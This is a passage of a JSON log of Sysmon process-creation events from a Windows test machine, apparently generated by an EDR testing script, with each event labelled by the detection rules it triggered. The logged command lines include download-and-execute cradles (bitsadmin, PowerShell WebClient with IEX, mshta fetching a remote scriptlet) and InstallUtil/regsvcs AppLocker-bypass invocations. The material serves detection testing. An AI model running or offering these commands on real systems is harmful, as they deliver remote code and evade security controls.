(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ProcessId":2948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4893,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.254713Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"EventData":{"CommandLine":"bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-00109B328600","ParentProcessId":6020,"ProcessGuid":"747F3D96-660F-5D3F-0000-00100F4F8600","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.667"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4894,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.886611Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Bitsadmin Job via PowerShell","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ParentProcessId":2948,"ProcessGuid":"747F3D96-660F-5D3F-0000-00106B508600","ProcessId":6720,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.695"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4895,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:03.966393Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ProcessId":108,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.174"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4897,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.202018Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":".NET Framework installation utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=1BEB7CDC82F57269A4AD123BE7F8B72F7F1B4630,MD5=7CCB088EEFBF464D0A467D0FF4C619DA,SHA256=0389427DA1D97388D89F28C2D856CD871FC200562C51749C6F6EF4FED9087FAE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ParentProcessId":108,"ProcessGuid":"747F3D96-6614-5D3F-0000-0010BFD98600","ProcessId":5696,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4899,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:08.446374Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6619-5D3F-0000-0010FDE78600","ProcessId":5116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:13.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4900,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:13.214691Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ProcessId":776,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.241"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4902,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.286776Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Mshta JavaScript Execution","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ParentProcessId":776,"ProcessGuid":"747F3D96-661E-5D3F-0000-00107F248700","ProcessId":3164,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4904,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:18.583990Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ProcessId":5816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.170"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4910,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.215719Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","PowerShell Download from URL","Encoded PowerShell Command Line","Windows PowerShell Web Request"],"event":{"Event":{"EventData":{"CommandLine":"powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ParentProcessId":5816,"ProcessGuid":"747F3D96-6623-5D3F-0000-0010BC068800","ProcessId":3000,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:23.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4912,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:23.507565Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ProcessId":1296,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.197"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4916,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.250664Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-001062788800","ProcessId":2040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4917,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:28.374373Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Services Installation Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=7D163D3FA313FC69F2510168EFC1240993AAF7D2,MD5=D15EF1C50607B320C31B5697AD126660,SHA256=549CBF63163B33A1CAD7703D4C8A1EF66EEDFFF249A7ECB181C5D2BD78DA2899,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6628-5D3F-0000-001067768800","ParentProcessId":1296,"ProcessGuid":"747F3D96-6628-5D3F-0000-00105B918800","ProcessId":4860,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4918,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.341503Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010B1968800","ProcessId":5708,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:28.756"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4919,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.565736Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regsvcs.exe AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6628-5D3F-0000-0010349B8800","ProcessId":6552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 